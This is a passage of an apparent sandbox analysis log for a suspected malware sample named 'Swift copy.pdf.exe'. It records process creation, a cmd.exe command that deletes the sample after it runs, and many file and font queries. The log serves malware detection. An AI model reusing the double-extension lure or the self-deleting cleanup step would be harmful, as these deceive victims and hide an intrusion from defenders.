          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'Jump to behavior
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Users\user\Desktop\Swift copy.pdf.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
